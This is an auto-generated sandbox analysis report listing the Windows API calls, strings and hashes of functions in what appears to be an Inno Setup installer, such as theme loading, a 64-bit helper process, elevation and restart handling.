Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6c06974965794d864392915e7a6b680c3d3b0c6831c6a02358c4469e8de6b1c
Instruction ID: 72cb28a769613da0e12d57a8c8ff31d21ec4f608c404a89b028e4eccd5103e64
Opcode Fuzzy Hash: c6c06974965794d864392915e7a6b680c3d3b0c6831c6a02358c4469e8de6b1c
Instruction Fuzzy Hash: 87518570E041459FEB01EFA9C482AAEBBF5EB49304F51817BE500E7351DB389D46CB98

Function 0041F3D4 Relevance: 1.3, APIs: 1, Instructions: 52memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,00000000,0041EDB4,?,0042389F,00423C1C,0041EDB4), ref: 0041F3F2

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 25741e919397043df0620f3a34db4bcef4e36b6359be59aa132e91d838a2cc50
Instruction ID: b55a7b9a32de56e4c0cdb05f5aaeda5055a0700d8eb896d56cc2d0e0b2117302
Opcode Fuzzy Hash: 25741e919397043df0620f3a34db4bcef4e36b6359be59aa132e91d838a2cc50
Instruction Fuzzy Hash: F01148742007069BC710DF19C880B86FBE4EB98390B14C53BE9988B385D374E8598BA9

Function 00452624 Relevance: 1.3, APIs: 1, Instructions: 48COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,0045268D), ref: 0045266F

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 6f78eaee849ee638804850479d3cdbdf5400ab5c1e67a59323e7cfb7155a44e8
Instruction ID: 0a85f8cb76b48f87276e85e1927624e59cb24adfaf40460ac6081df001af0a23
Opcode Fuzzy Hash: 6f78eaee849ee638804850479d3cdbdf5400ab5c1e67a59323e7cfb7155a44e8
Instruction Fuzzy Hash: BD0170356046446F8B10DF699C404EEF7F8DB4A3207208277FC64D3352DB745D099664

Function 0040170C Relevance: 1.3, APIs: 1, Instructions: 48COMMON

Download Yara Rule

APIs

VirtualFree.KERNEL32(?,?,00004000,?,?,?,000023E4,000063E7,00401973), ref: 00401766

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 827a1b883538dfed4e56bd6d9186317dde9c02c408e4bc47c040c509ac29fb8c
Instruction ID: 2f1b12c935ae24389c3dd8db424781fbbcf1746defe36878ea7ad6421184be39
Opcode Fuzzy Hash: 827a1b883538dfed4e56bd6d9186317dde9c02c408e4bc47c040c509ac29fb8c
Instruction Fuzzy Hash: 0C0170766043108FC3109F29DCC4E2677E8D780378F05413EDA84673A0D37A6C0187D9

Function 00406F50 Relevance: 1.3, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32 ref: 00406F51

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 8a7e85c26bba006a24699feaad57dd478220a7a6e3331b9edb59fbcda9639b9f
Instruction ID: 073c3129693101c5e7833b7ffa09eca8aa7a1e81ff9bb2ce6bcaaab03392c7d4
Opcode Fuzzy Hash: 8a7e85c26bba006a24699feaad57dd478220a7a6e3331b9edb59fbcda9639b9f
Instruction Fuzzy Hash:

Non-executed Functions

Function 0044AEAC Relevance: 166.5, APIs: 48, Strings: 47, Instructions: 252libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 0044AE58: GetVersionExA.KERNEL32(00000094), ref: 0044AE75

LoadLibraryA.KERNEL32(uxtheme.dll,?,0044EFC9,004970B6), ref: 0044AED3
GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 0044AEEB
GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 0044AEFD
GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 0044AF0F
GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 0044AF21
GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044AF33
GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044AF45
GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 0044AF57
GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 0044AF69
GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 0044AF7B
GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 0044AF8D
GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 0044AF9F
GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 0044AFB1
GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 0044AFC3
GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 0044AFD5
GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 0044AFE7
GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 0044AFF9
GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 0044B00B
GetProcAddress.KERNEL32(00000000,GetThemeString), ref: 0044B01D
GetProcAddress.KERNEL32(00000000,GetThemeBool), ref: 0044B02F
GetProcAddress.KERNEL32(00000000,GetThemeInt), ref: 0044B041
GetProcAddress.KERNEL32(00000000,GetThemeEnumValue), ref: 0044B053
GetProcAddress.KERNEL32(00000000,GetThemePosition), ref: 0044B065
GetProcAddress.KERNEL32(00000000,GetThemeFont), ref: 0044B077
GetProcAddress.KERNEL32(00000000,GetThemeRect), ref: 0044B089
GetProcAddress.KERNEL32(00000000,GetThemeMargins), ref: 0044B09B
GetProcAddress.KERNEL32(00000000,GetThemeIntList), ref: 0044B0AD
GetProcAddress.KERNEL32(00000000,GetThemePropertyOrigin), ref: 0044B0BF
GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 0044B0D1
GetProcAddress.KERNEL32(00000000,GetThemeFilename), ref: 0044B0E3
GetProcAddress.KERNEL32(00000000,GetThemeSysColor), ref: 0044B0F5
GetProcAddress.KERNEL32(00000000,GetThemeSysColorBrush), ref: 0044B107
GetProcAddress.KERNEL32(00000000,GetThemeSysBool), ref: 0044B119
GetProcAddress.KERNEL32(00000000,GetThemeSysSize), ref: 0044B12B
GetProcAddress.KERNEL32(00000000,GetThemeSysFont), ref: 0044B13D
GetProcAddress.KERNEL32(00000000,GetThemeSysString), ref: 0044B14F
GetProcAddress.KERNEL32(00000000,GetThemeSysInt), ref: 0044B161
GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0044B173
GetProcAddress.KERNEL32(00000000,IsAppThemed), ref: 0044B185
GetProcAddress.KERNEL32(00000000,GetWindowTheme), ref: 0044B197
GetProcAddress.KERNEL32(00000000,EnableThemeDialogTexture), ref: 0044B1A9
GetProcAddress.KERNEL32(00000000,IsThemeDialogTextureEnabled), ref: 0044B1BB
GetProcAddress.KERNEL32(00000000,GetThemeAppProperties), ref: 0044B1CD
GetProcAddress.KERNEL32(00000000,SetThemeAppProperties), ref: 0044B1DF
GetProcAddress.KERNEL32(00000000,GetCurrentThemeName), ref: 0044B1F1
GetProcAddress.KERNEL32(00000000,GetThemeDocumentationProperty), ref: 0044B203
GetProcAddress.KERNEL32(00000000,DrawThemeParentBackground), ref: 0044B215
GetProcAddress.KERNEL32(00000000,EnableTheming), ref: 0044B227

Strings

SetThemeAppProperties, xrefs: 0044B1D7
EnableTheming, xrefs: 0044B21F
GetThemeSysColorBrush, xrefs: 0044B0FF
GetThemeBool, xrefs: 0044B027
GetThemePropertyOrigin, xrefs: 0044B0B7
DrawThemeParentBackground, xrefs: 0044B20D
GetThemeAppProperties, xrefs: 0044B1C5
GetThemeBackgroundRegion, xrefs: 0044AF85
GetThemeBackgroundContentRect, xrefs: 0044AF2B, 0044AF3D
GetThemePartSize, xrefs: 0044AF4F
GetThemeSysInt, xrefs: 0044B159
GetThemeColor, xrefs: 0044AFF1
GetThemeFilename, xrefs: 0044B0DB
EnableThemeDialogTexture, xrefs: 0044B1A1
IsAppThemed, xrefs: 0044B17D
IsThemeDialogTextureEnabled, xrefs: 0044B1B3
DrawThemeIcon, xrefs: 0044AFBB
GetThemeString, xrefs: 0044B015
GetThemeIntList, xrefs: 0044B0A5
HitTestThemeBackground, xrefs: 0044AF97
GetThemeEnumValue, xrefs: 0044B04B
GetThemeDocumentationProperty, xrefs: 0044B1FB
GetThemeInt, xrefs: 0044B039
CloseThemeData, xrefs: 0044AEF5
GetCurrentThemeName, xrefs: 0044B1E9
GetThemeSysFont, xrefs: 0044B135
GetThemePosition, xrefs: 0044B05D
DrawThemeBackground, xrefs: 0044AF07
IsThemePartDefined, xrefs: 0044AFCD
GetThemeSysColor, xrefs: 0044B0ED
uxtheme.dll, xrefs: 0044AECE
GetThemeSysString, xrefs: 0044B147
SetWindowTheme, xrefs: 0044B0C9
GetThemeSysSize, xrefs: 0044B123
DrawThemeEdge, xrefs: 0044AFA9
OpenThemeData, xrefs: 0044AEE3
GetThemeTextMetrics, xrefs: 0044AF73
GetThemeFont, xrefs: 0044B06F
GetThemeMetric, xrefs: 0044B003
GetThemeTextExtent, xrefs: 0044AF61
GetThemeRect, xrefs: 0044B081
IsThemeActive, xrefs: 0044B16B
GetWindowTheme, xrefs: 0044B18F
GetThemeMargins, xrefs: 0044B093
DrawThemeText, xrefs: 0044AF19
IsThemeBackgroundPartiallyTransparent, xrefs: 0044AFDF
GetThemeSysBool, xrefs: 0044B111

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: AddressProc$LibraryLoadVersion
String ID: CloseThemeData$DrawThemeBackground$DrawThemeEdge$DrawThemeIcon$DrawThemeParentBackground$DrawThemeText$EnableThemeDialogTexture$EnableTheming$GetCurrentThemeName$GetThemeAppProperties$GetThemeBackgroundContentRect$GetThemeBackgroundRegion$GetThemeBool$GetThemeColor$GetThemeDocumentationProperty$GetThemeEnumValue$GetThemeFilename$GetThemeFont$GetThemeInt$GetThemeIntList$GetThemeMargins$GetThemeMetric$GetThemePartSize$GetThemePosition$GetThemePropertyOrigin$GetThemeRect$GetThemeString$GetThemeSysBool$GetThemeSysColor$GetThemeSysColorBrush$GetThemeSysFont$GetThemeSysInt$GetThemeSysSize$GetThemeSysString$GetThemeTextExtent$GetThemeTextMetrics$GetWindowTheme$HitTestThemeBackground$IsAppThemed$IsThemeActive$IsThemeBackgroundPartiallyTransparent$IsThemeDialogTextureEnabled$IsThemePartDefined$OpenThemeData$SetThemeAppProperties$SetWindowTheme$uxtheme.dll
API String ID: 1968650500-2910565190
Opcode ID: 58a82c8a34365b473289e4af6432c949e3c28b1c5dfbf877b155a0c5010eab07
Instruction ID: a412a743d8d6f7d45af61582fe4c6e78a33dc70606a22357c48ac29c98de50d6
Opcode Fuzzy Hash: 58a82c8a34365b473289e4af6432c949e3c28b1c5dfbf877b155a0c5010eab07
Instruction Fuzzy Hash: 5991C9B0640B50EBEF00EFF598C6A2A36A8EB15B14714457BB444EF295D778C814CF9E

Function 00457CE8 Relevance: 40.4, APIs: 11, Strings: 12, Instructions: 186pipeprocessfileCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00457D4F
QueryPerformanceCounter.KERNEL32(02133858,00000000,00457FE2,?,?,02133858,00000000,?,004586DE,?,02133858,00000000), ref: 00457D58
GetSystemTimeAsFileTime.KERNEL32(02133858,02133858), ref: 00457D62
GetCurrentProcessId.KERNEL32(?,02133858,00000000,00457FE2,?,?,02133858,00000000,?,004586DE,?,02133858,00000000), ref: 00457D6B
CreateNamedPipeA.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000), ref: 00457DE1
GetLastError.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000,?,02133858,02133858), ref: 00457DEF
CreateFileA.KERNEL32(00000000,C0000000,00000000,00498AF0,00000003,00000000,00000000,00000000,00457F9E), ref: 00457E37
SetNamedPipeHandleState.KERNEL32(000000FF,00000002,00000000,00000000,00000000,00457F8D,?,00000000,C0000000,00000000,00498AF0,00000003,00000000,00000000,00000000,00457F9E), ref: 00457E70

Part of subcall function 0042D890: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8A3

CreateProcessA.KERNEL32(00000000,00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000,00000000), ref: 00457F19
CloseHandle.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000), ref: 00457F4F
CloseHandle.KERNEL32(000000FF,00457F94,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000,00000000), ref: 00457F87

Part of subcall function 00452AFC: GetLastError.KERNEL32(00000000,0045356D,00000005,00000000,004535A2,?,?,00000000,0049A628,00000004,00000000,00000000,00000000,?,00496869,00000000), ref: 00452AFF

Strings

CreateProcess, xrefs: 00457F22
Starting 64-bit helper process., xrefs: 00457D1D
Cannot utilize 64-bit features on this version of Windows, xrefs: 00457D30
CreateFile, xrefs: 00457E45
i, xrefs: 00457ECC
64-bit helper EXE wasn't extracted, xrefs: 00457D43
SetNamedPipeHandleState, xrefs: 00457E79
\\.\pipe\InnoSetup64BitHelper-%.8x-%.8x-%.8x-%.8x%.8x, xrefs: 00457DB7
CreateNamedPipe, xrefs: 00457DFF
Helper process PID: %u, xrefs: 00457F6C
D, xrefs: 00457E92
helper %d 0x%x, xrefs: 00457EF8

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: CreateHandle$CloseErrorFileLastNamedPipeProcessSystemTime$CountCounterCurrentDirectoryPerformanceQueryStateTick
String ID: 64-bit helper EXE wasn't extracted$Cannot utilize 64-bit features on this version of Windows$CreateFile$CreateNamedPipe$CreateProcess$D$Helper process PID: %u$SetNamedPipeHandleState$Starting 64-bit helper process.$\\.\pipe\InnoSetup64BitHelper-%.8x-%.8x-%.8x-%.8x%.8x$helper %d 0x%x$i
API String ID: 770386003-3271284199
Opcode ID: 9bc676f9c34af54fa9c79b55e27a3e393b90950002bff594f479ab37992d8959
Instruction ID: c70edaa48864fe3754a193870ded2551bb9409a03b77fa183b8e4c23b8ad21c8
Opcode Fuzzy Hash: 9bc676f9c34af54fa9c79b55e27a3e393b90950002bff594f479ab37992d8959
Instruction Fuzzy Hash: 66712270A043449EDB10DB69DC45B9EBBF5AB05705F1084BAF908FB283DB7859488F69

Function 00476FAC Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 94COMMON

Download Yara Rule

APIs

Part of subcall function 00476E18: GetModuleHandleA.KERNEL32(kernel32.dll,GetFinalPathNameByHandleA,02132BD8,?,?,?,02132BD8,00476FDC,00000000,004770FA,?,?,-00000010,?), ref: 00476E31
Part of subcall function 00476E18: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00476E37
Part of subcall function 00476E18: GetFileAttributesA.KERNEL32(00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02132BD8,?,?,?,02132BD8,00476FDC,00000000,004770FA,?,?,-00000010,?), ref: 00476E4A
Part of subcall function 00476E18: CreateFileA.KERNEL32(00000000,00000000,00000007,00000000,00000003,00000000,00000000,00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02132BD8,?,?,?,02132BD8), ref: 00476E74
Part of subcall function 00476E18: CloseHandle.KERNEL32(00000000,?,?,?,02132BD8,00476FDC,00000000,004770FA,?,?,-00000010,?), ref: 00476E92

Part of subcall function 00476EF0: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00476F82,?,?,?,02132BD8,?,00476FE4,00000000,004770FA,?,?,-00000010,?), ref: 00476F20

ShellExecuteEx.SHELL32(0000003C), ref: 00477034
GetLastError.KERNEL32(00000000,004770FA,?,?,-00000010,?), ref: 0047703D
MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 0047708A
GetExitCodeProcess.KERNEL32(00000000,00000000), ref: 004770AE
CloseHandle.KERNEL32(00000000,004770DF,00000000,00000000,000000FF,000000FF,00000000,004770D8,?,00000000,004770FA,?,?,-00000010,?), ref: 004770D2

Strings

MsgWaitForMultipleObjects, xrefs: 00477097
<, xrefs: 00476FF3
runas, xrefs: 00477001
ShellExecuteEx, xrefs: 0047704E
GetExitCodeProcess, xrefs: 004770B7
ShellExecuteEx returned hProcess=0, xrefs: 0047705E

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: Handle$CloseFile$AddressAttributesCodeCreateCurrentDirectoryErrorExecuteExitLastModuleMultipleObjectsProcProcessShellWait
String ID: <$GetExitCodeProcess$MsgWaitForMultipleObjects$ShellExecuteEx$ShellExecuteEx returned hProcess=0$runas
API String ID: 883996979-221126205
Opcode ID: cdfc9ed65273480b993f908da37bc8b157bd69d2ac5039e997c7e7ab6857fd80
Instruction ID: 1ba95e0e0868ac7cc54db30065146fef24764d75c8f79a60f30d4c8031701125
Opcode Fuzzy Hash: cdfc9ed65273480b993f908da37bc8b157bd69d2ac5039e997c7e7ab6857fd80
Instruction Fuzzy Hash: 6F3162B0A04648AADB10EFAAC841ADEB7B9EF05314F90843BF508F7382D77C59048B59

Function 0042286C Relevance: 18.3, APIs: 12, Instructions: 255windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(00000000,00000223,00000000,00000000), ref: 00422A04
ShowWindow.USER32(00000000,00000003,00000000,00000223,00000000,00000000,00000000,00422BCE), ref: 00422A14

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: MessageSendShowWindow
String ID:
API String ID: 1631623395-0
Opcode ID: 2c26266a8c67d7a7ed143539e2fbf203b7c134ad6664bcde8bffe5e01bbb34f6
Instruction ID: 39dda2673d0f757005a7c2ebbeab04d2226afc2b16c541db07efabb99d57c27a
Opcode Fuzzy Hash: 2c26266a8c67d7a7ed143539e2fbf203b7c134ad6664bcde8bffe5e01bbb34f6
Instruction Fuzzy Hash: 8B916171B04214BFD710EFA9DA86F9D77F4AB04314F5500B6F904AB3A2CB78AE409B58

Function 00418394 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 58windowCOMMON

Download Yara Rule

APIs

IsIconic.USER32(?), ref: 004183A3
GetWindowPlacement.USER32(?,0000002C), ref: 004183C0
GetWindowRect.USER32(?), ref: 004183DC
GetWindowLongA.USER32(?,000000F0), ref: 004183EA
GetWindowLongA.USER32(?,000000F8), ref: 004183FF
ScreenToClient.USER32(00000000), ref: 00418408
ScreenToClient.USER32(00000000,?), ref: 00418413

Strings

,, xrefs: 004183AC

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: Window$ClientLongScreen$IconicPlacementRect
String ID: ,
API String ID: 2266315723-3772416878
Opcode ID: bc370706f242ec70077bf36f1e1d3e6d0ab536e6ab9c2c39735764bf232ebbb5
Instruction ID: f1655e9c1aaa1f9d3e17845697c0dfec8ab0781743990dff6cd0a114faef5a7c
Opcode Fuzzy Hash: bc370706f242ec70077bf36f1e1d3e6d0ab536e6ab9c2c39735764bf232ebbb5
Instruction Fuzzy Hash: D6112B71505201AFDB00EF69C885F9B77E8AF49314F18067EBD58DB286D738D900CBA9

Function 00454B00 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 41shutdownCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000028), ref: 00454B0F
OpenProcessToken.ADVAPI32(00000000,00000028), ref: 00454B15
LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 00454B2E
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000), ref: 00454B55
GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 00454B5A
ExitWindowsEx.USER32(00000002,00000000), ref: 00454B6B

Strings

SeShutdownPrivilege, xrefs: 00454B27

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
String ID: SeShutdownPrivilege
API String ID: 107509674-3733053543
Opcode ID: 4672a8203829a771e5d00f2c17f761bc323a5d0378d5eda1ad4e77e08b45408c
Instruction ID: 73069b54807863efa740a64668e3ddc19e7753e901194602af91027a354c2964
Opcode Fuzzy Hash: 4672a8203829a771e5d00f2c17f761bc323a5d0378d5eda1ad4e77e08b45408c
Instruction Fuzzy Hash: FDF0687068430275E610AA758C07F2B21989784B5DF50492EBE45EE1C3D7BCD44C8A6E

Function 0045C8A8 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 34libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(10000000,ISCryptGetVersion), ref: 0045C8B1
GetProcAddress.KERNEL32(10000000,ArcFourInit), ref: 0045C8C1
GetProcAddress.KERNEL32(10000000,ArcFourCrypt), ref: 0045C8D1
ISCryptGetVersion._ISCRYPT(10000000,ArcFourCrypt,10000000,ArcFourInit,10000000,ISCryptGetVersion,?,0047DFC7,00000000,0047DFF0), ref: 0045C8F6

Strings

ISCryptGetVersion, xrefs: 0045C8AB
ArcFourCrypt, xrefs: 0045C8CB
ArcFourInit, xrefs: 0045C8BB

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: AddressProc$CryptVersion
String ID: ArcFourCrypt$ArcFourInit$ISCryptGetVersion
API String ID: 1951258720-508647305
Opcode ID: 7e27a9db68ce5781c7a285243bc6d328b0b1bffa5381604cafab58ca7bab5c59
Instruction ID: b92a23805cb6ee5c0910e5f81ef8443a356b34338ef2df7ef9b51b6282c91381
